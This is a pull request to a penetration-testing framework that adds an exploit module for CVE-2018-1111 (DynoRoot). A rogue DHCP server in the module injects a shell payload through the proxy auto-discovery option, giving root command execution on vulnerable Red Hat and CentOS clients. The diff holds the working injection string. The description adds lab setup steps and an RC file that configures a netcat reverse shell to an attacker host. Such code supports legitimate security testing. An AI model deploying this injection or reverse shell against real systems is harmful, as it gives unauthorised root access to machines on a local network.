### PR TITLE
Add CVE-2018-1111 exploit

### DIFF
--- a/lib/rex/proto/dhcp/constants.rb
+++ b/lib/rex/proto/dhcp/constants.rb
@@ -23,6 +23,7 @@ OpDomainName = 15
 OpDns = 6
 OpHostname = 0x0c
 OpURL = 0x72
+OpProxyAutodiscovery = 0xfc
 OpEnd = 0xff
 
 PXEMagic = "\xF1\x00\x74\x7E"

--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -298,7 +298,7 @@ protected
     pkt << dhcpoption(OpSubnetMask, self.netmaskn)
     pkt << dhcpoption(OpRouter, self.router)
     pkt << dhcpoption(OpDns, self.dnsserv)
-    pkt << dhcpoption(OpDomainName, self.domain_name)
+    pkt << dhcpoption(OpDomainName, self.domain_name) if self.domain_name
 
     if self.servePXE  # PXE options
       pkt << dhcpoption(OpPXEMagic, PXEMagic)

--- a/lib/rex/proto/dhcp/server.rb
+++ b/lib/rex/proto/dhcp/server.rb
@@ -128,7 +128,7 @@ class Server
   def set_option(opts)
     allowed_options = [
       :serveOnce, :pxealtconfigfile, :servePXE, :relayip, :leasetime, :dnsserv,
-      :pxeconfigfile, :pxepathprefix, :pxereboottime, :router,
+      :pxeconfigfile, :pxepathprefix, :pxereboottime, :router, :proxy_auto_discovery,
       :give_hostname, :served_hostname, :served_over, :serveOnlyPXE, :domain_name, :url
     ]
 
@@ -154,7 +154,7 @@ class Server
   end
 
   attr_accessor :listen_host, :listen_port, :context, :leasetime, :relayip, :router, :dnsserv
-  attr_accessor :domain_name
+  attr_accessor :domain_name, :proxy_auto_discovery
   attr_accessor :sock, :thread, :myfilename, :ipstring, :served, :serveOnce
   attr_accessor :current_ip, :start_ip, :end_ip, :broadcasta, :netmaskn
   attr_accessor :servePXE, :pxeconfigfile, :pxealtconfigfile, :pxepathprefix, :pxereboottime, :serveOnlyPXE
@@ -292,6 +292,7 @@ protected
     end
 
     # Options!
+    pkt << dhcpoption(OpProxyAutodiscovery, self.proxy_auto_discovery) if self.proxy_auto_discovery
     pkt << dhcpoption(OpDHCPServer, self.ipstring)
     pkt << dhcpoption(OpLeaseTime, [self.leasetime].pack('N'))
     pkt << dhcpoption(OpSubnetMask, self.netmaskn)

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
 require 'rex/proto/dhcp'
 
 class MetasploitModule < Msf::Exploit::Remote

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -29,6 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Platform'       => ['unix'],
       'Arch'           => ARCH_CMD,
+      'Privileged'     => true,
       'References'     =>
         [
           ['CVE', '2018-1111'],
@@ -42,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
           ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
         ],
-      'PayloadType': 'cmd',
+      'PayloadType'    => 'cmd',
       'Targets'        => [ [ 'Automatic Target', { }] ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'May 15 2018'

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -32,6 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2018-1111'],
+          ['EDB': '44652'],
+          ['URL', 'https://github.com/kkirsche/CVE-2018-1111']
           ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
           ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
           ['AKA', 'DynoRoot'],

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -39,15 +39,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
           ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
         ],
+      'PayloadType': 'cmd',
       'Payload'        =>
         {
           # 255 for a domain name, minus some room for encoding
           'Space'       => 200,
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-            }
         },
       'Targets'        => [ [ 'Automatic Target', { }] ],
       'DefaultTarget'  => 0,

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -37,13 +37,12 @@ class MetasploitModule < Msf::Exploit::Remote
           ['AKA', 'DynoRoot'],
           ['URL', 'https://dynoroot.ninja/'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
+          ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],
           ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
         ],
       'PayloadType': 'cmd',
       'Payload'        =>
         {
-          # 255 for a domain name, minus some room for encoding
-          'Space'       => 200,
           'DisableNops' => true,
         },
       'Targets'        => [ [ 'Automatic Target', { }] ],
@@ -57,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     hash = datastore.copy
     start_service(hash)
-    @dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #")
+    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(1)}'&#{payload.encoded} #")
 
     begin
       while @dhcp.thread.alive?

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -34,6 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2018-1111'],
           ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
           ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
+          ['AKA', 'DynoRoot'],
           ['URL', 'https://dynoroot.ninja/'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
           ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
@@ -53,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => 'May 15 2018'
     ))
 
-    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL', 'FILENAME')
   end
 
   def exploit

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           ['CVE', '2018-1111'],
           ['EDB': '44652'],
-          ['URL', 'https://github.com/kkirsche/CVE-2018-1111']
+          ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
           ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
           ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
           ['AKA', 'DynoRoot'],

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/proto/dhcp'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'DHCP Client Command Injection (DynoRoot)',
-      'Description'    => %q|
+      'Description'    => %q{
         This module exploits the DynoRoot vulnerability, a flaw in how the
          NetworkManager integration script included in the DHCP client in
          Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
          to execute arbitrary commands with root privileges on systems using
          NetworkManager and configured to obtain network configuration using
          the DHCP protocol.
-      |,
+      },
       'Author'         =>
         [
           'Felix Wilhelm', # Vulnerability discovery

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -32,12 +32,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'Privileged'     => true,
       'References'     =>
         [
+          ['AKA', 'DynoRoot'],
           ['CVE', '2018-1111'],
           ['EDB': '44652'],
           ['URL', 'https://github.com/kkirsche/CVE-2018-1111'],
           ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
           ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
-          ['AKA', 'DynoRoot'],
           ['URL', 'https://dynoroot.ninja/'],
           ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
           ['URL', 'https://www.tenable.com/blog/advisory-red-hat-dhcp-client-command-injection-trouble'],

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -41,10 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
         ],
       'PayloadType': 'cmd',
-      'Payload'        =>
-        {
-          'DisableNops' => true,
-        },
       'Targets'        => [ [ 'Automatic Target', { }] ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'May 15 2018'
@@ -56,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     hash = datastore.copy
     start_service(hash)
-    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(1)}'&#{payload.encoded} #")
+    @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
 
     begin
       while @dhcp.thread.alive?
@@ -67,4 +63,3 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 end
-

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/proto/dhcp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::DHCPServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
+      'Description'    => %q|
+        This module exploits the DynoRoot vulnerability, a flaw in how the
+         NetworkManager integration script included in the DHCP client in
+         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
+         processes DHCP options. A malicious DHCP server, or an attacker on
+         the local network able to spoof DHCP responses, could use this flaw
+         to execute arbitrary commands with root privileges on systems using
+         NetworkManager and configured to obtain network configuration using
+         the DHCP protocol.
+      |,
+      'Author'         =>
+        [
+          'Felix Wilhelm', # Vulnerability discovery
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+          ['CVE', '2018-1111'],
+          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
+          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
+          ['URL', 'https://dynoroot.ninja/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
+        ],
+      'Payload'        =>
+        {
+          # 255 for a domain name, minus some room for encoding
+          'Space'       => 200,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+            }
+        },
+      'Targets'        => [ [ 'Automatic Target', { }] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 15 2018'
+    ))
+
+    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
+  end
+
+  def exploit
+    hash = datastore.copy
+    start_service(hash)
+    @dhcp.set_option(proxy_auto_discovery: "x'&#{payload.encoded} #")
+
+    begin
+      while @dhcp.thread.alive?
+        sleep 2
+      end
+    ensure
+      stop_service
+    end
+  end
+end
+


### PR DESCRIPTION
## Verification

- [x] Setup CentOS virtual machine and Kali virtual machine
- [x] Ensure proper versions are in use. This was tested on `CentOS Linux release 7.4.1708 (Core)` with NetworkManager version `1.8.0-11.el7_4`
- [x] Create isolated custom network (e.g. 192.168.41.0/24)
- [x] Disable DHCP server on custom network for easier verification 
- [x] Start `msfconsole` on Kali Linux
- [x] `use exploit/unix/dhcp/rhel_dhcp_client_command_injection`
- [x] Configure `SRVHOST` and `NETMASK` required variables
- [x] Configure `PAYLOAD` and supporting options
- [x] Start the DHCP server
- [x] On CentOS 7 machine, request a new DHCP address. Assuming primary interface is `ens33`, you can use: `clear && nmcli conn down id "ens33" && nmcli conn up id "ens33" && ip addr show`
- [x] This should request a new DHCP from your server (if other DHCP servers exist, note that then this becomes a race condition often requiring DHCP NAK's to get your DHCP to win)

~Not included :(~
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

Validated using RC File:

```
use exploit/unix/dhcp/rhel_dhcp_client_command_injection
set SRVHOST 192.168.41.129
set NETMASK 255.255.255.0
set PAYLOAD cmd/unix/reverse_netcat
set LHOST 192.168.41.2
set LPORT 1337
exploit -j -z
```